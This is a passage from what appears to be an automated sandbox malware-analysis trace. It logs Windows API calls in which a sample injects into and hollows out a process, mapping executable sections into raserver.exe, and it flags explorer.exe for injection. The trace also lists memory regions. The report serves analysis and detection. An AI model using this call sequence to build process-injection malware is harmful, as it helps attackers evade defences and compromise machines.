[25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xe0, [29]=0x19, [30]=0x55, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x61, [39]=0x82, [40]=0xf8, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xf, [47]=0x82, [48]=0xf8, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0104.958] NtSetContextThread (ThreadHandle=0xc4, Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xda, [65]=0x0, [66]=0x1, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xdc, [73]=0x0, [74]=0x1, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x4, SegGs=0x0, SegFs=0x554310, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcedd0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0xffffffff, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xec, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xcb, [23]=0x82, [24]=0xf8, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xe0, [29]=0x19, [30]=0x55, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x61, [39]=0x82, [40]=0xf8, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xcd, [46]=0xcb, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0104.958] NtQueueApcThread (ThreadHandle=0xc4, ApcRoutine=0x7cbcdd9, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0104.963] NtResumeThread (in: ThreadHandle=0xc4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0104.963] NtClose (Handle=0xc0) returned 0x0 [0104.963] NtClose (Handle=0xc4) returned 0x0 [0104.963] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x19e05c | out: BaseAddress=0x19e05c*=0x755e0000) returned 0x0 [0104.997] PostThreadMessageW (idThread=0x74c, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0105.126] NtDelayExecution (Alertable=0, Interval=0x19e0d4*=-30000000) returned 0x0 [0108.176] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7cff000, Buffer=0x19e0f8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x19e0f8*, NumberOfBytesRead=0x0) returned 0x0 [0108.177] NtClose (Handle=0xbc) returned 0x0 [0108.177] NtOpenProcess (in: ProcessHandle=0x19f1d4, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x700, UniqueThread=0x0) | out: ProcessHandle=0x19f1d4*=0xbc) returned 0x0 [0108.183] NtOpenThread (in: ThreadHandle=0x19f1d8, DesiredAccess=0x1a, ObjectAttributes=0x19ea94, ClientId=0x19ea60*(UniqueProcess=0x0, UniqueThread=0xf20) | out: ThreadHandle=0x19f1d8*=0xd0) returned 0x0 [0108.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\raserver.exe", NtPathName=0x19e098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\raserver.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.184] NtCreateFile (in: FileHandle=0x19e0b8, DesiredAccess=0x120089, ObjectAttributes=0x19e080*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\raserver.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e0a0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e0b8*=0xd4, IoStatusBlock=0x19e0a0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0108.184] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d8198) returned 1 [0108.184] NtQueryInformationFile (in: FileHandle=0xd4, IoStatusBlock=0x19e0a0, FileInformation=0x19dff8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e0a0, FileInformation=0x19dff8) returned 0x0 [0108.184] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x19800) returned 0x5da968 [0108.193] NtReadFile (in: FileHandle=0xd4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19e0a0, Buffer=0x5da968, BufferLength=0x19400, ByteOffset=0x19e010*=0, Key=0x0 | out: IoStatusBlock=0x19e0a0, Buffer=0x5da968*) returned 0x0 [0108.197] NtClose (Handle=0xd4) returned 0x0 [0108.197] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1e001) returned 0x5f4170 [0108.201] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da968) returned 1 [0108.201] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e404, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e404, ReturnLength=0x0) returned 0x0 [0108.201] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x221008, Buffer=0x19efc8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19efc8*, NumberOfBytesRead=0x0) returned 0x0 [0108.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x530000, RegionSize=0x19eab0, FreeType=0x8000) returned 0x0 [0108.203] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x12b0000, Buffer=0x5f4170, NumberOfBytesToRead=0x1e000, NumberOfBytesRead=0x0 | out: Buffer=0x5f4170*, NumberOfBytesRead=0x0) returned 0x0 [0108.213] NtCreateSection (in: SectionHandle=0x19f264, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f264*=0xd4) returned 0x0 [0108.213] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0xffffffff, BaseAddress=0x19f260*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f260*=0xe70000, SectionOffset=0x0, ViewSize=0x19eab8*=0x2f000) returned 0x0 [0108.215] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0xbc, BaseAddress=0x19ed20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef4c*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed20*=0x110000, SectionOffset=0x0, ViewSize=0x19ef4c*=0x2f000) returned 0x0 [0108.221] NtCreateSection (in: SectionHandle=0x19efc0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eac8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19efc0*=0xd8) returned 0x0 [0108.221] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0xffffffff, BaseAddress=0x19efc4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eac8*=0x1e000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc4*=0x530000, SectionOffset=0x0, ViewSize=0x19eac8*=0x1e000) returned 0x0 [0108.227] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5f4170) returned 1 [0108.238] NtUnmapViewOfSection (ProcessHandle=0xbc, BaseAddress=0x12b0000) returned 0x0 [0108.242] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0xbc, BaseAddress=0x19efc8*=0x12b0000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f1f4*=0x1e000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc8*=0x12b0000, SectionOffset=0x0, ViewSize=0x19f1f4*=0x1e000) returned 0x0 [0108.260] NtResumeThread (in: ThreadHandle=0xd0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0108.265] ExitProcess (uExitCode=0x0) Thread: id = 10 os_tid = 0xfd0 Process: id = "4" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x20537000" os_pid = "0x748" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "3" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 504 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 505 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 506 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 507 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 508 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 509 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 510 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 511 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 512 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 513 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 514 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 515 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 516 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 517 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 518 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 519 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 520 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 521 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 522 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 523 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 524 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: 